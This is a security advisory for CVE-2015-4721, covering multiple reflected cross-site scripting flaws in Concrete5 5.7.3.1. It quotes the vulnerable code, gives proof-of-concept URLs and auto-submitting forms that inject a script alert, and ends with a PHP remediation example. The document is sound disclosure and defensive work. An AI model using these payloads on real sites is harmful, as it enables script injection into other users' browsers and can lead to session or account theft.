Concrete5 Multiple Reflected XSS Advisory


Edition: 1.0
Last Edit: 24/06/2015
Classification: Not restricted

Multiple Reflected Cross Site Scripting Vulnerabilities in Concrete5 version 5.7.3.1

Author: Egidio Romano

Multiple Reflected XSS in Concrete5 version 5.7.3.1 (Edition: v1.0, Date: 24/06/2015, Not restricted)

Summary

    Vulnerabilities Class: Cross Site Scripting (XSS)
    CVE ID: CVE-2015-4721
    Remote: Yes
    Local: No
    Published: June 6, 2015
    Updated: June 24, 2015
    Credit: Egidio Romano
    Vulnerable Version: 5.7.3.1 and probably prior versions
    Fixed On: 5.7.4
    Other References:
        https://hackerone.com/reports/59661
        http://blog.mindedsecurity.com/2015/06/multiple-security-issues-discovered-in-concrete5-part1.html

Description

Concrete5 is vulnerable to several reflected Cross Site Scripting (XSS) attacks because certain user input is used within the HTML output it generates without being validated or encoded.

Vulnerability Details

The following reflected XSS vulnerabilities were identified.

File: /concrete/views/panels/details/page/versions.php (lines 5-14):

    <?php
    foreach($_REQUEST['cvID'] as $cvID) {
        $tabs[] = array('view-version-' . $cvID, t('Version %s', $cvID), $checked);
        $checked = false;
    }
    print $ih->tabs($tabs);
    foreach($_REQUEST['cvID'] as $cvID) { ?>
        <div id="ccm-tab-content-view-version-<?php echo $cvID?>" style="display: <?php echo $display?>; height: 100%">
        <iframe border="0" id="v<?php echo time()?>" frameborder="0" height="100%" width="100%" src="<?php echo REL_DIR_FILES_TOOLS_REQUIRED?>/pages/preview_version?cvID=<?php echo $cvID?>&amp;cID=<?php echo $_REQUEST['cID']?>" />

User input passed through the "cvID" and "cID" request parameters is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user's browser by tricking the victim user into visiting malicious URLs like these:

    http://[host]/index.php/ccm/system/panels/details/page/versions?cID=1&cvID[]=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E%3C!--
    http://[host]/index.php/ccm/system/panels/details/page/versions?cvID[]=1&cID=1%22%3E%3C/iframe%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E

File: /concrete/src/Form/Service/Widget/UserSelector.php (lines 17-35):

    public function selectUser($fieldName, $uID = false, $javascriptFunc …
        $selectedUID = 0;
        if (isset($_REQUEST[$fieldName])) {
            $selectedUID = $_REQUEST[$fieldName];
        } else if ($uID > 0) {
            $selectedUID = $uID;
        }
        $html = '';
        $html .= '<div class="ccm-summary-selected-item"><div class="ccm-summary-selected-item-inner"><strong class="ccm-summary-selected-item-label">';
        if ($selectedUID > 0) {
            $ui = UserInfo::getByID($selectedUID);
            $html .= $ui->getUserName();
        }
        $html .= '</strong></div>';
        $identifier = new Concrete\Core\Utility\Service\Identifier();
        $selector = $identifier->getString(32);
        $html .= '<a class="ccm-sitemap-select-item" data-form-user-selector="' . $selector . '" dialog-append-buttons="true" dialog-width="90%" dialog-height="70%" dialog-modal="false" dialog-title="' . t('Choose User') . '" href="' . URL::to('/ccm/system/dialogs/user/search') . '">' . t('Select User') . '</a>';
        $html .= '<input type="hidden" data-form-user-selector-input="' . $selector . '" name="' . $fieldName . '" value="' . $selectedUID . '">';

User input passed through the "uID" request parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user's browser by tricking the victim user into visiting a malicious URL like this:

    http://[host]/index.php/ccm/system/panels/details/page/attributes?cID=1&uID=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E

File: /concrete/elements/group/search.php (lines 4-20):

    $searchRequest = $_REQUEST;
    $result = Loader::helper('json')->encode($controller->getSearchResultObject()->getJSONObject());
    $tree = GroupTree::get();
    $guestGroupNode = GroupTreeNode::getTreeNodeByGroupID(GUEST_GROUP_ID);
    $registeredGroupNode = GroupTreeNode::getTreeNodeByGroupID(REGISTERED_GROUP_ID);
    ?>
    <style type="text/css">
        div[data-search=groups] form.ccm-search-fields { margin-left: 0px !important; }
    </style>
    <div data-search="groups">
        <script type="text/template" data-template="search-form">
            <form role="form" data-search-form="groups" action="<?php echo URL::to('/ccm/system/search/groups/submit')?>" class="form-inline ccm-search-fields ccm-search-fields-none">
                <input type="hidden" name="filter" value="<?php echo $searchRequest['filter']?>" />

User input passed through the "filter" request parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user's browser by tricking the victim user into visiting a malicious URL like this:

    http://[host]/index.php/dashboard/users/groups?filter=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E

URL: http://[host]/index.php/dashboard/system/multilingual/setup/load_icon

User input passed through the "msCountry" POST parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user's browser by tricking the victim user into visiting a malicious web page like this:

    <html>
    <body>
    <form method="POST" action="http://[host]/index.php/dashboard/system/multilingual/setup/load_icon">
        <input type="hidden" name="msCountry" value='"><script>alert(/XSS/)</script><!--'>
    </form>
    <script>document.forms[0].submit()</script>
    </body>
    </html>

URL: http://[host]/index.php/dashboard/pages/single

User input passed through the "pageURL" POST parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user's browser by tricking the victim user into visiting a malicious web page like this:

    <html>
    <body>
    <form method="POST" action="http://[host]/index.php/dashboard/pages/single">
        <input type="hidden" name="pageURL" value='"><script>alert(/XSS/)</script>'>
    </form>
    <script>document.forms[0].submit()</script>
    </body>
    </html>

File: /concrete/attributes/select/form.php (lines 55-60):

    $vals = $this->post('atSelectNewOption');
    if (is_array($vals)) {
        foreach($vals as $v) { ?>
            <div class="newAttrValue">
                <?php echo $form->hidden($this->field('atSelectNewOption') . '[]', $v)?>
                <span class="badge"><?php echo $v?></span>

User input passed through the "atSelectNewOption" POST parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user's browser.
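Every finding in this advisory has the same root cause: a request value reaches an HTML attribute or element body without validation or output encoding. The example below is added here and is not concrete5's own code or the fix shipped in 5.7.4; it shows the two remedies a maintainer would apply to the quoted patterns, namely validating identifier parameters (cID, cvID, uID) as integers and HTML-encoding every value at the point it is written into markup. The helper names (h, intId, the render* functions) and the simplified iframe path are assumptions of this example; the inputs are the decoded payloads from the proof-of-concept URLs above, used here only to check that the hardened output no longer contains markup.

```php
<?php
// Added example, not concrete5 code: the two fixes that close every case in
// this advisory, applied to the patterns the advisory quotes.
declare(strict_types=1);

/** Encode a string for HTML text or for a double-/single-quoted attribute. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

/** Parameters that are record identifiers (cID, cvID, uID) must be integers. */
function intId($value): int
{
    if (is_array($value) || filter_var($value, FILTER_VALIDATE_INT) === false) {
        return 0; // concrete5 treats 0 as "no record"; reject anything non-numeric
    }
    return (int) $value;
}

/** versions.php pattern, before: IDs echoed raw into an id attribute and an iframe src. */
function renderVersionTabVulnerable(string $cvID, string $cID): string
{
    return '<div id="ccm-tab-content-view-version-' . $cvID . '">'
         . '<iframe src="/tools/pages/preview_version?cvID=' . $cvID . '&amp;cID=' . $cID . '"></iframe></div>';
}

/** versions.php pattern, after: validate as integers, then still encode on output. */
function renderVersionTabFixed($cvID, $cID): string
{
    $cvID = intId($cvID);
    $cID  = intId($cID);
    $src  = '/tools/pages/preview_version?cvID=' . $cvID . '&cID=' . $cID;
    return '<div id="ccm-tab-content-view-version-' . h((string) $cvID) . '">'
         . '<iframe src="' . h($src) . '"></iframe></div>';
}

/** search.php and select/form.php patterns: free-text values in an attribute and an element body. */
function renderFilterFixed(string $filter, array $newOptions): string
{
    $html = '<input type="hidden" name="filter" value="' . h($filter) . '" />';
    foreach ($newOptions as $v) {
        $html .= '<div class="newAttrValue">'
               . '<input type="hidden" name="atSelectNewOption[]" value="' . h((string) $v) . '">'
               . '<span class="badge">' . h((string) $v) . '</span></div>';
    }
    return $html;
}

// Constructed inputs: the decoded payloads carried by the advisory's proof-of-concept URLs.
$cvID   = '"><script>alert(/XSS/)</script><!--';
$cID    = '1"></iframe><script>alert(/XSS/)</script>';
$filter = '"><script>alert(/XSS/)</script>';

echo "Vulnerable:\n", renderVersionTabVulnerable($cvID, $cID), "\n\n";
echo "Fixed:\n", renderVersionTabFixed($cvID, $cID), "\n";
echo renderFilterFixed($filter, [$filter]), "\n";

// Regression check a maintainer can keep: no raw tag may survive in the hardened output,
// and the non-numeric identifiers must have been rejected (rendered as 0).
assert(strpos(renderVersionTabFixed($cvID, $cID), '<script') === false);
assert(strpos(renderVersionTabFixed($cvID, $cID), 'cvID=0&amp;cID=0') !== false);
assert(strpos(renderFilterFixed($filter, [$filter]), '<script') === false);
```

Validation and encoding are deliberately both applied: integer casting alone fixes the identifier cases, but encoding at the output site is what protects the free-text parameters (filter, msCountry, pageURL, atSelectNewOption), and keeping it on the identifiers too means a later change to how an ID is sourced cannot silently reintroduce the bug.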
